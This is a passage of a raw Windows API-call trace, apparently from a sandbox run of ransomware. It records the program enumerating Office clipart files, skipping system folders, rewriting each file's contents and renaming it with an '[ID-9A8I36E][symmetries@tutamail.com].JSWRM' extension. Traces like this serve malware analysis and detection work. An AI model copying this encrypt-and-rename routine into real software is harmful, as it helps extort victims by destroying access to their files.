hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea574b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea574b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea574b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x812c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0153047.WMF", cAlternateFileName="")) returned 1 [0085.405] lstrcmpiW (lpString1="J0153047.WMF", lpString2=".") returned 1 [0085.405] lstrcmpiW (lpString1="J0153047.WMF", lpString2="..") returned 1 [0085.405] lstrcmpiW (lpString1="J0153047.WMF", lpString2="...") returned 1 [0085.405] lstrcmpiW (lpString1="J0153047.WMF", lpString2="windows") returned -1 [0085.405] lstrcmpiW (lpString1="J0153047.WMF", lpString2="recovery") returned -1 [0085.405] lstrcmpiW (lpString1="J0153047.WMF", lpString2="perflogs") returned -1 [0085.405] lstrcmpiW (lpString1="J0153047.WMF", lpString2="documents and settings") returned 1 [0085.405] lstrcmpiW (lpString1="J0153047.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.405] lstrcmpiW (lpString1="J0153047.WMF", lpString2="system volume information") returned -1 [0085.405] lstrcmpiW (lpString1="J0153047.WMF", lpString2="msocache") returned -1 [0085.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0085.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153047.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153047.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153047.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0085.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0085.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153047.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153047.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153047.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0085.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0085.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0085.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0085.405] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153047.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.406] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=33068) returned 1 [0085.406] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8120) returned 0x24d210 [0085.406] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8120, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8120, lpOverlapped=0x0) returned 1 [0085.418] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.418] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8120, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8120, lpOverlapped=0x0) returned 1 [0085.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.419] CloseHandle (hObject=0x314) returned 1 [0085.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0085.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0085.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0085.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0085.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0085.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0085.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0085.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0085.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0085.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0085.420] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153047.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153047.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153047.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0085.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0085.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0085.421] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea574b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea574b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea574b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x778, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0153087.WMF", cAlternateFileName="")) returned 1 [0085.421] lstrcmpiW (lpString1="J0153087.WMF", lpString2=".") returned 1 [0085.421] lstrcmpiW (lpString1="J0153087.WMF", lpString2="..") returned 1 [0085.421] lstrcmpiW (lpString1="J0153087.WMF", lpString2="...") returned 1 [0085.421] lstrcmpiW (lpString1="J0153087.WMF", lpString2="windows") returned -1 [0085.421] lstrcmpiW (lpString1="J0153087.WMF", lpString2="recovery") returned -1 [0085.421] lstrcmpiW (lpString1="J0153087.WMF", lpString2="perflogs") returned -1 [0085.421] lstrcmpiW (lpString1="J0153087.WMF", lpString2="documents and settings") returned 1 [0085.421] lstrcmpiW (lpString1="J0153087.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.421] lstrcmpiW (lpString1="J0153087.WMF", lpString2="system volume information") returned -1 [0085.421] lstrcmpiW (lpString1="J0153087.WMF", lpString2="msocache") returned -1 [0085.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0085.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153087.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153087.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153087.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0085.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0085.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153087.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153087.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153087.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0085.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0085.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0085.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0085.421] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153087.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153087.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.423] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1912) returned 1 [0085.423] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x770) returned 0x20c6c0 [0085.423] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x770, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x770, lpOverlapped=0x0) returned 1 [0085.439] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.440] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x770, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x770, lpOverlapped=0x0) returned 1 [0085.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0085.440] CloseHandle (hObject=0x314) returned 1 [0085.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0085.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0085.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0085.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0085.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0085.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0085.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0085.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0085.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0085.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0085.440] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153087.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153087.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153087.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153087.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0085.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0085.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0085.441] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea574b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea574b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea574b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ea8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0153089.WMF", cAlternateFileName="")) returned 1 [0085.441] lstrcmpiW (lpString1="J0153089.WMF", lpString2=".") returned 1 [0085.441] lstrcmpiW (lpString1="J0153089.WMF", lpString2="..") returned 1 [0085.441] lstrcmpiW (lpString1="J0153089.WMF", lpString2="...") returned 1 [0085.441] lstrcmpiW (lpString1="J0153089.WMF", lpString2="windows") returned -1 [0085.441] lstrcmpiW (lpString1="J0153089.WMF", lpString2="recovery") returned -1 [0085.441] lstrcmpiW (lpString1="J0153089.WMF", lpString2="perflogs") returned -1 [0085.441] lstrcmpiW (lpString1="J0153089.WMF", lpString2="documents and settings") returned 1 [0085.441] lstrcmpiW (lpString1="J0153089.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.441] lstrcmpiW (lpString1="J0153089.WMF", lpString2="system volume information") returned -1 [0085.441] lstrcmpiW (lpString1="J0153089.WMF", lpString2="msocache") returned -1 [0085.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0085.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153089.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153089.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153089.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0085.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0085.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153089.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153089.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153089.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0085.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0085.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0085.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0085.442] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153089.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.442] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7848) returned 1 [0085.442] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ea0) returned 0x205850 [0085.442] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1ea0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1ea0, lpOverlapped=0x0) returned 1 [0085.454] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.454] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1ea0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1ea0, lpOverlapped=0x0) returned 1 [0085.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0085.454] CloseHandle (hObject=0x314) returned 1 [0085.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0085.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0085.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0085.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0085.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0085.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0085.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0085.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0085.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0085.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0085.454] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153089.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153089.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153089.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0085.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0085.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0085.455] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea574b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea574b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea574b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1fc8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0153091.WMF", cAlternateFileName="")) returned 1 [0085.455] lstrcmpiW (lpString1="J0153091.WMF", lpString2=".") returned 1 [0085.455] lstrcmpiW (lpString1="J0153091.WMF", lpString2="..") returned 1 [0085.455] lstrcmpiW (lpString1="J0153091.WMF", lpString2="...") returned 1 [0085.455] lstrcmpiW (lpString1="J0153091.WMF", lpString2="windows") returned -1 [0085.455] lstrcmpiW (lpString1="J0153091.WMF", lpString2="recovery") returned -1 [0085.455] lstrcmpiW (lpString1="J0153091.WMF", lpString2="perflogs") returned -1 [0085.455] lstrcmpiW (lpString1="J0153091.WMF", lpString2="documents and settings") returned 1 [0085.456] lstrcmpiW (lpString1="J0153091.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.456] lstrcmpiW (lpString1="J0153091.WMF", lpString2="system volume information") returned -1 [0085.456] lstrcmpiW (lpString1="J0153091.WMF", lpString2="msocache") returned -1 [0085.456] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0085.456] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153091.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.456] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153091.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153091.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0085.456] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0085.456] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 